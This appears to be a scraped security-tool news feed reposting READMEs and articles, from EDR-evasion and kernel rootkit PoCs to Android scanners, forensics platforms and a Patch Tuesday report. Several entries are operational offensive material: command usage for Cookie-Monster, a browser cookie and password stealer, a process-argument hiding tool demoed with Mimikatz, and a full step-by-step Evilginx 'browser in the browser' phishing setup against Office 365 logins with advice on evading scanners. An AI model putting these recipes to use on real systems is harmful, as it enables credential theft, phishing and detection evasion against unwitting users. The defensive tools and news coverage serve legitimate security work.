CrimsonEDR is an open-source project engineered to identify specific malware patterns, offering a tool for honing skills in circumventing Endpoint Detection and Response (EDR). By leveraging diverse detection methods, it empowers users to deepen their understanding of security evasion tactics.


Detection Description
Direct Syscall Detects the usage of direct system calls, often employed by malware to bypass traditional API hooks.
NTDLL Unhooking Identifies attempts to unhook functions within the NTDLL library, a common evasion technique.
AMSI Patch Detects modifications to the Anti-Malware Scan Interface (AMSI) through byte-level analysis.
ETW Patch Detects byte-level alterations to Event Tracing for Windows (ETW), commonly manipulated by malware to evade detection.
PE Stomping Identifies instances of PE (Portable Executable) stomping.
Reflective PE Loading Detects the reflective loading of PE files, a technique employed by malware to avoid static analysis.
Unbacked Thread Origin Identifies threads originating from unbacked memory regions, often indicative of malicious activity.
Unbacked Thread Start Address Detects threads with start addresses pointing to unbacked memory, a potential sign of code injection.
API hooking Places a hook on the NtWriteVirtualMemory function to monitor memory modifications.
Custom Pattern Search Allows users to search for specific patterns provided in a JSON file, facilitating the identification of known malware signatures.


To get started with CrimsonEDR, follow these steps:

  1. Install dependancy: bash sudo apt-get install gcc-mingw-w64-x86-64
  2. Clone the repository: bash git clone
  3. Compile the project: bash cd CrimsonEDR; chmod +x; ./

⚠️ Warning

Windows Defender and other antivirus programs may flag the DLL as malicious due to its content containing bytes used to verify if the AMSI has been patched. Please ensure to whitelist the DLL or disable your antivirus temporarily when using CrimsonEDR to avoid any interruptions.


To use CrimsonEDR, follow these steps:

  1. Make sure the ioc.json file is placed in the current directory from which the executable being monitored is launched. For example, if you launch your executable to monitor from C:\Users\admin\, the DLL will look for ioc.json in C:\Users\admin\ioc.json. Currently, ioc.json contains patterns related to msfvenom. You can easily add your own in the following format:
"IOC": [
["0x03", "0x4c", "0x24", "0x08", "0x45", "0x39", "0xd1", "0x75"],
["0xf1", "0x4c", "0x03", "0x4c", "0x24", "0x08", "0x45", "0x39"],
["0x58", "0x44", "0x8b", "0x40", "0x24", "0x49", "0x01", "0xd0"],
["0x66", "0x41", "0x8b", "0x0c", "0x48", "0x44", "0x8b", "0x40"],
["0x8b", "0x0c", "0x48", "0x44", "0x8b", "0x40", "0x1c", "0x49"],
["0x01", "0xc1", "0x38", "0xe0", "0x75", "0xf1", "0x4c", "0x03"],
["0x24", "0x49", "0x01", "0xd0", "0x66", "0x41", "0x8b", "0x0c"],
["0xe8", "0xcc", "0x00", "0x00", "0x00", "0x41", "0x51", "0x41"]
  1. Execute CrimsonEDRPanel.exe with the following arguments:

    • -d <path_to_dll>: Specifies the path to the CrimsonEDR.dll file.

    • -p <process_id>: Specifies the Process ID (PID) of the target process where you want to inject the DLL.

For example:

.\CrimsonEDRPanel.exe -d C:\Temp\CrimsonEDR.dll -p 1234

Useful Links

Here are some useful resources that helped in the development of this project:


For questions, feedback, or support, please reach out to me via:

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VectorKernel - PoCs For Kernelmode Rootkit Techniques Research

By: Zion3R — April 18th 2024 at 12:30

PoCs for Kernelmode rootkit techniques research or education. Currently focusing on Windows OS. All modules support 64bit OS only.


Some modules use ExAllocatePool2 API to allocate kernel pool memory. ExAllocatePool2 API is not supported in OSes older than Windows 10 Version 2004. If you want to test the modules in old OSes, replace ExAllocatePool2 API with ExAllocatePoolWithTag API.



All modules are tested in Windows 11 x64. To test drivers, following options can be used for the testing machine:

  1. Enable Loading of Test Signed Drivers

  2. debugging-in-windbg--cdb--or-ntsd">Setting Up Kernel-Mode Debugging

Each options require to disable secure boot.


Detailed information is given in in each project's directories. All modules are tested in Windows 11.

Module Name Description
BlockImageLoad PoCs to block driver loading with Load Image Notify Callback method.
BlockNewProc PoCs to block new process with Process Notify Callback method.
CreateToken PoCs to get full privileged SYSTEM token with ZwCreateToken() API.
DropProcAccess PoCs to drop process handle access with Object Notify Callback.
GetFullPrivs PoCs to get full privileges with DKOM method.
GetProcHandle PoCs to get full access process handle from kernelmode.
InjectLibrary PoCs to perform DLL injection with Kernel APC Injection method.
ModHide PoCs to hide loaded kernel drivers with DKOM method.
ProcHide PoCs to hide process with DKOM method.
ProcProtect PoCs to manipulate Protected Process.
QueryModule PoCs to perform retrieving kernel driver loaded address information.
StealToken PoCs to perform token stealing from kernelmode.


More PoCs especially about following things will be added later:

  • Notify callback
  • Filesystem mini-filter
  • Network mini-filter

Recommended References

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Cookie-Monster - BOF To Steal Browser Cookies & Credentials

By: Zion3R — April 17th 2024 at 12:30

Steal browser cookies for edge, chrome and firefox through a BOF or exe! Cookie-Monster will extract the WebKit master key, locate a browser process with a handle to the Cookies and Login Data files, copy the handle(s) and then filelessly download the target. Once the Cookies/Login Data file(s) are downloaded, the python decryption script can help extract those secrets! Firefox module will parse the profiles.ini and locate where the logins.json and key4.db files are located and download them. A seperate github repo is referenced for offline decryption.

BOF Usage

Usage: cookie-monster [ --chrome || --edge || --firefox || --chromeCookiePID <pid> || --chromeLoginDataPID <PID> || --edgeCookiePID <pid> || --edgeLoginDataPID <pid>] 
cookie-monster Example:
cookie-monster --chrome
cookie-monster --edge
cookie-moster --firefox
cookie-monster --chromeCookiePID 1337
cookie-monster --chromeLoginDataPID 1337
cookie-monster --edgeCookiePID 4444
cookie-monster --edgeLoginDataPID 4444
cookie-monster Options:
--chrome, looks at all running processes and handles, if one matches chrome.exe it copies the handle to Cookies/Login Data and then copies the file to the CWD
--edge, looks at all running processes and handles, if one matches msedge.exe it copies the handle to Cookies/Login Data and then copies the file to the CWD
--firefox, looks for profiles.ini and locates the key4.db and logins.json file
--chromeCookiePID, if chrome PI D is provided look for the specified process with a handle to cookies is known, specifiy the pid to duplicate its handle and file
--chromeLoginDataPID, if chrome PID is provided look for the specified process with a handle to Login Data is known, specifiy the pid to duplicate its handle and file
--edgeCookiePID, if edge PID is provided look for the specified process with a handle to cookies is known, specifiy the pid to duplicate its handle and file
--edgeLoginDataPID, if edge PID is provided look for the specified process with a handle to Login Data is known, specifiy the pid to duplicate its handle and file

EXE usage

Cookie Monster Example:
cookie-monster.exe --all
Cookie Monster Options:
-h, --help Show this help message and exit
--all Run chrome, edge, and firefox methods
--edge Extract edge keys and download Cookies/Login Data file to PWD
--chrome Extract chrome keys and download Cookies/Login Data file to PWD
--firefox Locate firefox key and Cookies, does not make a copy of either file

Decryption Steps

Install requirements

pip3 install -r requirements.txt

Base64 encode the webkit masterkey

python3 "\xec\xfc...."

Decrypt Chrome/Edge Cookies File

python .\ "XHh..." --cookies ChromeCookie.db

Results Example:
Path: /
Name: dotcom_user
Cookie: KingOfTheNOPs
Expires: Oct 28 2024 21:25:22

Path: /
Name: user_session
Cookie: x123.....
Expires: Nov 11 2023 21:25:22

Decrypt Chome/Edge Passwords File

python .\ "XHh..." --passwords ChromePasswords.db

Results Example:
Username: tester
Password: McTesty

Decrypt Firefox Cookies and Stored Credentials:


Ensure Mingw-w64 and make is installed on the linux prior to compiling.


to compile exe on windows

gcc .\cookie-monster.c -o cookie-monster.exe -lshlwapi -lcrypt32


  • update to support firefox based on firepwd and add bruteforce module based on DonPAPI


This project could not have been done without the help of Mr-Un1k0d3r and his amazing seasonal videos! Highly recommend checking out his lessons!!!
Cookie Webkit Master Key Extractor:
Fileless download:
Decrypt Cookies and Login Data:

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NoArgs - Tool Designed To Dynamically Spoof And Conceal Process Arguments While Staying Undetected

By: Zion3R — April 16th 2024 at 12:30

NoArgs is a tool designed to dynamically spoof and conceal process arguments while staying undetected. It achieves this by hooking into Windows APIs to dynamically manipulate the Windows internals on the go. This allows NoArgs to alter process arguments discreetly.

Default Cmd:

Windows Event Logs:

Using NoArgs:

Windows Event Logs:

Functionality Overview

The tool primarily operates by intercepting process creation calls made by the Windows API function CreateProcessW. When a process is initiated, this function is responsible for spawning the new process, along with any specified command-line arguments. The tool intervenes in this process creation flow, ensuring that the arguments are either hidden or manipulated before the new process is launched.

Hooking Mechanism

Hooking into CreateProcessW is achieved through Detours, a popular library for intercepting and redirecting Win32 API functions. Detours allows for the redirection of function calls to custom implementations while preserving the original functionality. By hooking into CreateProcessW, the tool is able to intercept the process creation requests and execute its custom logic before allowing the process to be spawned.

Process Environment Block (PEB) Manipulation

The Process Environment Block (PEB) is a data structure utilized by Windows to store information about a process's environment and execution state. The tool leverages the PEB to manipulate the command-line arguments of the newly created processes. By modifying the command-line information stored within the PEB, the tool can alter or conceal the arguments passed to the process.

Demo: Running Mimikatz and passing it the arguments:

Process Hacker View:

All the arguemnts are hidden dynamically

Process Monitor View:

Technical Implementation

  1. Injection into Command Prompt (cmd): The tool injects its code into the Command Prompt process, embedding it as Position Independent Code (PIC). This enables seamless integration into cmd's memory space, ensuring covert operation without reliance on specific memory addresses. (Only for The Obfuscated Executable in the releases page)

  2. Windows API Hooking: Detours are utilized to intercept calls to the CreateProcessW function. By redirecting the execution flow to a custom implementation, the tool can execute its logic before the original Windows API function.

  3. Custom Process Creation Function: Upon intercepting a CreateProcessW call, the custom function is executed, creating the new process and manipulating its arguments as necessary.

  4. PEB Modification: Within the custom process creation function, the Process Environment Block (PEB) of the newly created process is accessed and modified to achieve the goal of manipulating or hiding the process arguments.

  5. Execution Redirection: Upon completion of the manipulations, the execution seamlessly returns to Command Prompt (cmd) without any interruptions. This dynamic redirection ensures that subsequent commands entered undergo manipulation discreetly, evading detection and logging mechanisms that relay on getting the process details from the PEB.

Installation and Usage:

Option 1: Compile NoArgs DLL:

  • You will need microsoft/Detours">Microsoft Detours installed.

  • Compile the DLL.

  • Inject the compiled DLL into any cmd instance to manipulate newly created process arguments dynamically.

Option 2: Download the compiled executable (ready-to-go) from the releases page.



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Frameless-Bitb - A New Approach To Browser In The Browser (BITB) Without The Use Of Iframes, Allowing The Bypass Of Traditional Framebusters Implemented By Login Pages Like Microsoft And The Use With Evilginx

By: Zion3R — April 15th 2024 at 12:30

A new approach to Browser In The Browser (BITB) without the use of iframes, allowing the bypass of traditional framebusters implemented by login pages like Microsoft.

This POC code is built for using this new BITB with Evilginx, and a Microsoft Enterprise phishlet.

Before diving deep into this, I recommend that you first check my talk at BSides 2023, where I first introduced this concept along with important details on how to craft the "perfect" phishing attack. ▶ Watch Video

☕︎ Buy Me A Coffee

Video Tutorial: 👇


This tool is for educational and research purposes only. It demonstrates a non-iframe based Browser In The Browser (BITB) method. The author is not responsible for any misuse. Use this tool only legally and ethically, in controlled environments for cybersecurity defense testing. By using this tool, you agree to do so responsibly and at your own risk.

Backstory - The Why

Over the past year, I've been experimenting with different tricks to craft the "perfect" phishing attack. The typical "red flags" people are trained to look for are things like urgency, threats, authority, poor grammar, etc. The next best thing people nowadays check is the link/URL of the website they are interacting with, and they tend to get very conscious the moment they are asked to enter sensitive credentials like emails and passwords.

That's where Browser In The Browser (BITB) came into play. Originally introduced by @mrd0x, BITB is a concept of creating the appearance of a believable browser window inside of which the attacker controls the content (by serving the malicious website inside an iframe). However, the fake URL bar of the fake browser window is set to the legitimate site the user would expect. This combined with a tool like Evilginx becomes the perfect recipe for a believable phishing attack.

The problem is that over the past months/years, major websites like Microsoft implemented various little tricks called "framebusters/framekillers" which mainly attempt to break iframes that might be used to serve the proxied website like in the case of Evilginx.

In short, Evilginx + BITB for websites like Microsoft no longer works. At least not with a BITB that relies on iframes.

The What

A Browser In The Browser (BITB) without any iframes! As simple as that.

Meaning that we can now use BITB with Evilginx on websites like Microsoft.

Evilginx here is just a strong example, but the same concept can be used for other use-cases as well.

The How

Framebusters target iframes specifically, so the idea is to create the BITB effect without the use of iframes, and without disrupting the original structure/content of the proxied page. This can be achieved by injecting scripts and HTML besides the original content using search and replace (aka substitutions), then relying completely on HTML/CSS/JS tricks to make the visual effect. We also use an additional trick called "Shadow DOM" in HTML to place the content of the landing page (background) in such a way that it does not interfere with the proxied content, allowing us to flexibly use any landing page with minor additional JS scripts.


Video Tutorial

Local VM:

Create a local Linux VM. (I personally use Ubuntu 22 on VMWare Player or Parallels Desktop)

Update and Upgrade system packages:

sudo apt update && sudo apt upgrade -y

Evilginx Setup:


Create a new evilginx user, and add user to sudo group:

sudo su

adduser evilginx

usermod -aG sudo evilginx

Test that evilginx user is in sudo group:

su - evilginx

sudo ls -la /root

Navigate to users home dir:

cd /home/evilginx

(You can do everything as sudo user as well since we're running everything locally)

Setting Up Evilginx

Download and build Evilginx: Official Docs

Copy Evilginx files to /home/evilginx

Install Go: Official Docs

sudo tar -C /usr/local -xzf go1.21.4.linux-amd64.tar.gz
nano ~/.profile

ADD: export PATH=$PATH:/usr/local/go/bin

source ~/.profile


go version

Install make:

sudo apt install make

Build Evilginx:

cd /home/evilginx/evilginx2

Create a new directory for our evilginx build along with phishlets and redirectors:

mkdir /home/evilginx/evilginx

Copy build, phishlets, and redirectors:

cp /home/evilginx/evilginx2/build/evilginx /home/evilginx/evilginx/evilginx

cp -r /home/evilginx/evilginx2/redirectors /home/evilginx/evilginx/redirectors

cp -r /home/evilginx/evilginx2/phishlets /home/evilginx/evilginx/phishlets

Ubuntu firewall quick fix (thanks to @kgretzky)

sudo setcap CAP_NET_BIND_SERVICE=+eip /home/evilginx/evilginx/evilginx

On Ubuntu, if you get Failed to start nameserver on: :53 error, try modifying this file

sudo nano /etc/systemd/resolved.conf

edit/add the DNSStubListener to no > DNSStubListener=no


sudo systemctl restart systemd-resolved

Modify Evilginx Configurations:

Since we will be using Apache2 in front of Evilginx, we need to make Evilginx listen to a different port than 443.

nano ~/.evilginx/config.json

CHANGE https_port from 443 to 8443

Install Apache2 and Enable Mods:

Install Apache2:

sudo apt install apache2 -y

Enable Apache2 mods that will be used: (We are also disabling access_compat module as it sometimes causes issues)

sudo a2enmod proxy
sudo a2enmod proxy_http
sudo a2enmod proxy_balancer
sudo a2enmod lbmethod_byrequests
sudo a2enmod env
sudo a2enmod include
sudo a2enmod setenvif
sudo a2enmod ssl
sudo a2ensite default-ssl
sudo a2enmod cache
sudo a2enmod substitute
sudo a2enmod headers
sudo a2enmod rewrite
sudo a2dismod access_compat

Start and enable Apache:

sudo systemctl start apache2
sudo systemctl enable apache2

Try if Apache and VM networking works by visiting the VM's IP from a browser on the host machine.

Clone this Repo:

Install git if not already available:

sudo apt -y install git

Clone this repo:

git clone
cd frameless-bitb

Apache Custom Pages:

Make directories for the pages we will be serving:

  • home: (Optional) Homepage (at base domain)
  • primary: Landing page (background)
  • secondary: BITB Window (foreground)
sudo mkdir /var/www/home
sudo mkdir /var/www/primary
sudo mkdir /var/www/secondary

Copy the directories for each page:

sudo cp -r ./pages/home/ /var/www/

sudo cp -r ./pages/primary/ /var/www/

sudo cp -r ./pages/secondary/ /var/www/

Optional: Remove the default Apache page (not used):

sudo rm -r /var/www/html/

Copy the O365 phishlet to phishlets directory:

sudo cp ./O365.yaml /home/evilginx/evilginx/phishlets/O365.yaml

Optional: To set the Calendly widget to use your account instead of the default I have inside, go to pages/primary/script.js and change the CALENDLY_PAGE_NAME and CALENDLY_EVENT_TYPE.

Note on Demo Obfuscation: As I explain in the walkthrough video, I included a minimal obfuscation for text content like URLs and titles of the BITB. You can open the demo obfuscator by opening demo-obfuscator.html in your browser. In a real-world scenario, I would highly recommend that you obfuscate larger chunks of the HTML code injected or use JS tricks to avoid being detected and flagged. The advanced version I am working on will use a combination of advanced tricks to make it nearly impossible for scanners to fingerprint/detect the BITB code, so stay tuned.

Self-signed SSL certificates:

Since we are running everything locally, we need to generate self-signed SSL certificates that will be used by Apache. Evilginx will not need the certs as we will be running it in developer mode.

We will use the domain which will point to our local VM. If you want to use a different domain, make sure to change the domain in all files (Apache conf files, JS files, etc.)

Create dir and parents if they do not exist:

sudo mkdir -p /etc/ssl/localcerts/

Generate the SSL certs using the OpenSSL config file:

sudo openssl req -x509 -nodes -days 365 -newkey rsa:2048 \
-keyout /etc/ssl/localcerts/ -out /etc/ssl/localcerts/ \
-config openssl-local.cnf

Modify private key permissions:

sudo chmod 600 /etc/ssl/localcerts/

Apache Custom Configs:

Copy custom substitution files (the core of our approach):

sudo cp -r ./custom-subs /etc/apache2/custom-subs

Important Note: In this repo I have included 2 substitution configs for Chrome on Mac and Chrome on Windows BITB. Both have auto-detection and styling for light/dark mode and they should act as base templates to achieve the same for other browser/OS combos. Since I did not include automatic detection of the browser/OS combo used to visit our phishing page, you will have to use one of two or implement your own logic for automatic switching.

Both config files under /apache-configs/ are the same, only with a different Include directive used for the substitution file that will be included. (there are 2 references for each file)

# Uncomment the one you want and remember to restart Apache after any changes:
#Include /etc/apache2/custom-subs/win-chrome.conf
Include /etc/apache2/custom-subs/mac-chrome.conf

Simply to make it easier, I included both versions as separate files for this next step.

Windows/Chrome BITB:

sudo cp ./apache-configs/win-chrome-bitb.conf /etc/apache2/sites-enabled/000-default.conf

Mac/Chrome BITB:

sudo cp ./apache-configs/mac-chrome-bitb.conf /etc/apache2/sites-enabled/000-default.conf

Test Apache configs to ensure there are no errors:

sudo apache2ctl configtest

Restart Apache to apply changes:

sudo systemctl restart apache2

Modifying Hosts:

Get the IP of the VM using ifconfig and note it somewhere for the next step.

We now need to add new entries to our hosts file, to point the domain used in this demo and all used subdomains to our VM on which Apache and Evilginx are running.

On Windows:

Open Notepad as Administrator (Search > Notepad > Right-Click > Run as Administrator)

Click on the File option (top-left) and in the File Explorer address bar, copy and paste the following:


Change the file types (bottom-right) to "All files".

Double-click the file named hosts

On Mac:

Open a terminal and run the following:

sudo nano /private/etc/hosts

Now modify the following records (replace [IP] with the IP of your VM) then paste the records at the end of the hosts file:

# Local Apache and Evilginx Setup
# End of section

Save and exit.

Now restart your browser before moving to the next step.

Note: On Mac, use the following command to flush the DNS cache:

sudo dscacheutil -flushcache; sudo killall -HUP mDNSResponder

Important Note:

This demo is made with the provided Office 365 Enterprise phishlet. To get the host entries you need to add for a different phishlet, use phishlet get-hosts [PHISHLET_NAME] but remember to replace the with the actual local IP of your VM.

Trusting the Self-Signed SSL Certs:

Since we are using self-signed SSL certificates, our browser will warn us every time we try to visit so we need to make our host machine trust the certificate authority that signed the SSL certs.

For this step, it's easier to follow the video instructions, but here is the gist anyway.

Open in your Chrome browser.

Ignore the Unsafe Site warning and proceed to the page.

Click the SSL icon > Details > Export Certificate IMPORTANT: When saving, the name MUST end with .crt for Windows to open it correctly.

Double-click it > install for current user. Do NOT select automatic, instead place the certificate in specific store: select "Trusted Route Certification Authorities".

On Mac: to install for current user only > select "Keychain: login" AND click on "View Certificates" > details > trust > Always trust

Now RESTART your Browser

You should be able to visit now and see the homepage without any SSL warnings.

Running Evilginx:

At this point, everything should be ready so we can go ahead and start Evilginx, set up the phishlet, create our lure, and test it.

Optional: Install tmux (to keep evilginx running even if the terminal session is closed. Mainly useful when running on remote VM.)

sudo apt install tmux -y

Start Evilginx in developer mode (using tmux to avoid losing the session):

tmux new-session -s evilginx
cd ~/evilginx/
./evilginx -developer

(To re-attach to the tmux session use tmux attach-session -t evilginx)

Evilginx Config:

config domain
config ipv4

IMPORTANT: Set Evilginx Blacklist mode to NoAdd to avoid blacklisting Apache since all requests will be coming from Apache and not the actual visitor IP.

blacklist noadd

Setup Phishlet and Lure:

phishlets hostname O365
phishlets enable O365
lures create O365
lures get-url 0

Copy the lure URL and visit it from your browser (use Guest user on Chrome to avoid having to delete all saved/cached data between tests).

Useful Resources

Original iframe-based BITB by @mrd0x:

Evilginx Mastery Course by the creator of Evilginx @kgretzky:

My talk at BSides 2023:

How to protect Evilginx using Cloudflare and HTML Obfuscation:

Evilginx resources for Microsoft 365 by @BakkerJan:


  • Create script(s) to automate most of the steps

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APKDeepLens - Android Security Insights In Full Spectrum

By: Zion3R — April 11th 2024 at 12:30

APKDeepLens is a Python based tool designed to scan Android applications (APK files) for security vulnerabilities. It specifically targets the OWASP Top 10 mobile vulnerabilities, providing an easy and efficient way for developers, penetration testers, and security researchers to assess the security posture of Android apps.


APKDeepLens is a Python-based tool that performs various operations on APK files. Its main features include:

  • APK Analysis -> Scans Android application package (APK) files for security vulnerabilities.
  • OWASP Coverage -> Covers OWASP Top 10 vulnerabilities to ensure a comprehensive security assessment.
  • Advanced Detection -> Utilizes custom python code for APK file analysis and vulnerability detection.
  • Sensitive Information Extraction -> Identifies potential security risks by extracting sensitive information from APK files, such as insecure authentication/authorization keys and insecure request protocols.
  • In-depth Analysis -> Detects insecure data storage practices, including data related to the SD card, and highlights the use of insecure request protocols in the code.
  • Intent Filter Exploits -> Pinpoint vulnerabilities by analyzing intent filters extracted from AndroidManifest.xml.
  • Local File Vulnerability Detection -> Safeguard your app by identifying potential mishandlings related to local file operations
  • Report Generation -> Generates detailed and easy-to-understand reports for each scanned APK, providing actionable insights for developers.
  • CI/CD Integration -> Designed for easy integration into CI/CD pipelines, enabling automated security testing in development workflows.
  • User-Friendly Interface -> Color-coded terminal outputs make it easy to distinguish between different types of findings.


To use APKDeepLens, you'll need to have Python 3.8 or higher installed on your system. You can then install APKDeepLens using the following command:

For Linux

git clone
cd /APKDeepLens
python3 -m venv venv
source venv/bin/activate
pip install -r requirements.txt
python --help

For Windows

git clone
cd \APKDeepLens
python3 -m venv venv
pip install -r .\requirements.txt
python --help


To simply scan an APK, use the below command. Mention the apk file with -apk argument. Once the scan is complete, a detailed report will be displayed in the console.

python3 -apk file.apk

If you've already extracted the source code and want to provide its path for a faster scan you can use the below command. Mention the source code of the android application with -source parameter.

python3 -apk file.apk -source <source-code-path>

To generate detailed PDF and HTML reports after the scan you can pass -report argument as mentioned below.

python3 -apk file.apk -report


We welcome contributions to the APKDeepLens project. If you have a feature request, bug report, or proposal, please open a new issue here.

For those interested in contributing code, please follow the standard GitHub process. We'll review your contributions as quickly as possible :)

Featured at

☐ ☆ ✇ Krebs on Security

April’s Patch Tuesday Brings Record Number of Fixes

By: BrianKrebs — April 9th 2024 at 20:28

If only Patch Tuesdays came around infrequently — like total solar eclipse rare — instead of just creeping up on us each month like The Man in the Moon. Although to be fair, it would be tough for Microsoft to eclipse the number of vulnerabilities fixed in this month’s patch batch — a record 147 flaws in Windows and related software.

Yes, you read that right. Microsoft today released updates to address 147 security holes in Windows, Office, Azure, .NET Framework, Visual Studio, SQL Server, DNS Server, Windows Defender, Bitlocker, and Windows Secure Boot.

“This is the largest release from Microsoft this year and the largest since at least 2017,” said Dustin Childs, from Trend Micro’s Zero Day Initiative (ZDI). “As far as I can tell, it’s the largest Patch Tuesday release from Microsoft of all time.”

Tempering the sheer volume of this month’s patches is the middling severity of many of the bugs. Only three of April’s vulnerabilities earned Microsoft’s most-dire “critical” rating, meaning they can be abused by malware or malcontents to take remote control over unpatched systems with no help from users.

Most of the flaws that Microsoft deems “more likely to be exploited” this month are marked as “important,” which usually involve bugs that require a bit more user interaction (social engineering) but which nevertheless can result in system security bypass, compromise, and the theft of critical assets.

Ben McCarthy, lead cyber security engineer at Immersive Labs called attention to CVE-2024-20670, an Outlook for Windows spoofing vulnerability described as being easy to exploit. It involves convincing a user to click on a malicious link in an email, which can then steal the user’s password hash and authenticate as the user in another Microsoft service.

Another interesting bug McCarthy pointed to is CVE-2024-29063, which involves hard-coded credentials in Azure’s search backend infrastructure that could be gleaned by taking advantage of Azure AI search.

“This along with many other AI attacks in recent news shows a potential new attack surface that we are just learning how to mitigate against,” McCarthy said. “Microsoft has updated their backend and notified any customers who have been affected by the credential leakage.”

CVE-2024-29988 is a weakness that allows attackers to bypass Windows SmartScreen, a technology Microsoft designed to provide additional protections for end users against phishing and malware attacks. Childs said one of ZDI’s researchers found this vulnerability being exploited in the wild, although Microsoft doesn’t currently list CVE-2024-29988 as being exploited.

“I would treat this as in the wild until Microsoft clarifies,” Childs said. “The bug itself acts much like CVE-2024-21412 – a [zero-day threat from February] that bypassed the Mark of the Web feature and allows malware to execute on a target system. Threat actors are sending exploits in a zipped file to evade EDR/NDR detection and then using this bug (and others) to bypass Mark of the Web.”

Update, 7:46 p.m. ET: A previous version of this story said there were no zero-day vulnerabilities fixed this month. BleepingComputer reports that Microsoft has since confirmed that there are actually two zero-days. One is the flaw Childs just mentioned (CVE-2024-21412), and the other is CVE-2024-26234, described as a “proxy driver spoofing” weakness.

Satnam Narang at Tenable notes that this month’s release includes fixes for two dozen flaws in Windows Secure Boot, the majority of which are considered “Exploitation Less Likely” according to Microsoft.

“However, the last time Microsoft patched a flaw in Windows Secure Boot in May 2023 had a notable impact as it was exploited in the wild and linked to the BlackLotus UEFI bootkit, which was sold on dark web forums for $5,000,” Narang said. “BlackLotus can bypass functionality called secure boot, which is designed to block malware from being able to load when booting up. While none of these Secure Boot vulnerabilities addressed this month were exploited in the wild, they serve as a reminder that flaws in Secure Boot persist, and we could see more malicious activity related to Secure Boot in the future.”

For links to individual security advisories indexed by severity, check out ZDI’s blog and the Patch Tuesday post from the SANS Internet Storm Center. Please consider backing up your data or your drive before updating, and drop a note in the comments here if you experience any issues applying these fixes.

Adobe today released nine patches tackling at least two dozen vulnerabilities in a range of software products, including Adobe After Effects, Photoshop, Commerce, InDesign, Experience Manager, Media Encoder, Bridge, Illustrator, and Adobe Animate.

KrebsOnSecurity needs to correct the record on a point mentioned at the end of March’s “Fat Patch Tuesday” post, which looked at new AI capabilities built into Adobe Acrobat that are turned on by default. Adobe has since clarified that its apps won’t use AI to auto-scan your documents, as the original language in its FAQ suggested.

“In practice, no document scanning or analysis occurs unless a user actively engages with the AI features by agreeing to the terms, opening a document, and selecting the AI Assistant or generative summary buttons for that specific document,” Adobe said earlier this month.

☐ ☆ ✇ The Hacker News

Mispadu Trojan Targets Europe, Thousands of Credentials Compromised

By: Newsroom — April 3rd 2024 at 09:32
The banking trojan known as&nbsp;Mispadu&nbsp;has expanded its focus beyond Latin America (LATAM) and Spanish-speaking individuals to target users in Italy, Poland, and Sweden. Targets of the ongoing campaign include entities spanning finance, services, motor vehicle manufacturing, law firms, and commercial facilities, according to Morphisec. "Despite the geographic expansion, Mexico remains the
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VolWeb - A Centralized And Enhanced Memory Analysis Platform

By: Zion3R — April 2nd 2024 at 11:30

VolWeb is a digital forensic memory analysis platform that leverages the power of the Volatility 3 framework. It is dedicated to aiding in investigations and incident responses.


The goal of VolWeb is to enhance the efficiency of memory collection and forensic analysis by providing a centralized, visual, and enhanced web application for incident responders and digital forensics investigators. Once an investigator obtains a memory image from a Linux or Windows system, the evidence can be uploaded to VolWeb, which triggers automatic processing and extraction of artifacts using the power of the Volatility 3 framework.

By utilizing cloud-native storage technologies, VolWeb also enables incident responders to directly upload memory images into the VolWeb platform from various locations using dedicated scripts interfaced with the platform and maintained by the community. Another goal is to allow users to compile technical information, such as Indicators, which can later be imported into modern CTI platforms like OpenCTI, thereby connecting your incident response and CTI teams after your investigation.

Project Documentation and Getting Started Guide

The project documentation is available on the Wiki. There, you will be able to deploy the tool in your investigation environment or lab.

[!IMPORTANT] Take time to read the documentation in order to avoid common miss-configuration issues.

Interacting with the REST API

VolWeb exposes a REST API to allow analysts to interact with the platform. There is a dedicated repository proposing some scripts maintained by the community: Check the wiki of the project to learn more about the possible API calls.


If you have encountered a bug, or wish to propose a feature, please feel free to open an issue. To enable us to quickly address them, follow the guide in the "Contributing" section of the Wiki associated with the project.


Contact me at for any questions regarding this tool.

Next Release Goals

Check out the roadmap:

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Drozer - The Leading Security Assessment Framework For Android

By: Zion3R — April 1st 2024 at 11:30

drozer (formerly Mercury) is the leading security testing framework for Android.

drozer allows you to search for security vulnerabilities in apps and devices by assuming the role of an app and interacting with the Dalvik VM, other apps' IPC endpoints and the underlying OS.

drozer provides tools to help you use, share and understand public Android exploits. It helps you to deploy a drozer Agent to a device through exploitation or social engineering. Using weasel (WithSecure's advanced exploitation payload) drozer is able to maximise the permissions available to it by installing a full agent, injecting a limited agent into a running process, or connecting a reverse shell to act as a Remote Access Tool (RAT).

drozer is a good tool for simulating a rogue application. A penetration tester does not have to develop an app with custom code to interface with a specific content provider. Instead, drozer can be used with little to no programming experience required to show the impact of letting certain components be exported on a device.

drozer is open source software, maintained by WithSecure, and can be downloaded from:

Docker Container

To help with making sure drozer can be run on modern systems, a Docker container was created that has a working build of Drozer. This is currently the recommended method of using Drozer on modern systems.

  • The Docker container and basic setup instructions can be found here.
  • Instructions on building your own Docker container can be found here.

Manual Building and Installation


  1. Python2.7

Note: On Windows please ensure that the path to the Python installation and the Scripts folder under the Python installation are added to the PATH environment variable.

  1. Protobuf 2.6 or greater

  2. Pyopenssl 16.2 or greater

  3. Twisted 10.2 or greater

  4. Java Development Kit 1.7

Note: On Windows please ensure that the path to javac.exe is added to the PATH environment variable.

  1. Android Debug Bridge

Building Python wheel

git clone
cd drozer
python bdist_wheel

Installing Python wheel

sudo pip install dist/drozer-2.x.x-py2-none-any.whl

Building for Debian/Ubuntu/Mint

git clone
cd drozer
make deb

Installing .deb (Debian/Ubuntu/Mint)

sudo dpkg -i drozer-2.x.x.deb

Building for Redhat/Fedora/CentOS

git clone
cd drozer
make rpm

Installing .rpm (Redhat/Fedora/CentOS)

sudo rpm -I drozer-2.x.x-1.noarch.rpm

Building for Windows

NOTE: Windows Defender and other Antivirus software will flag drozer as malware (an exploitation tool without exploit code wouldn't be much fun!). In order to run drozer you would have to add an exception to Windows Defender and any antivirus software. Alternatively, we recommend running drozer in a Windows/Linux VM.

git clone
cd drozer
python.exe bdist_msi

Installing .msi (Windows)

Run dist/ 


Installing the Agent

Drozer can be installed using Android Debug Bridge (adb).

Download the latest Drozer Agent here.

$ adb install drozer-agent-2.x.x.apk

Starting a Session

You should now have the drozer Console installed on your PC, and the Agent running on your test device. Now, you need to connect the two and you're ready to start exploring.

We will use the server embedded in the drozer Agent to do this.

If using the Android emulator, you need to set up a suitable port forward so that your PC can connect to a TCP socket opened by the Agent inside the emulator, or on the device. By default, drozer uses port 31415:

$ adb forward tcp:31415 tcp:31415

Now, launch the Agent, select the "Embedded Server" option and tap "Enable" to start the server. You should see a notification that the server has started.

Then, on your PC, connect using the drozer Console:

On Linux:

$ drozer console connect

On Windows:

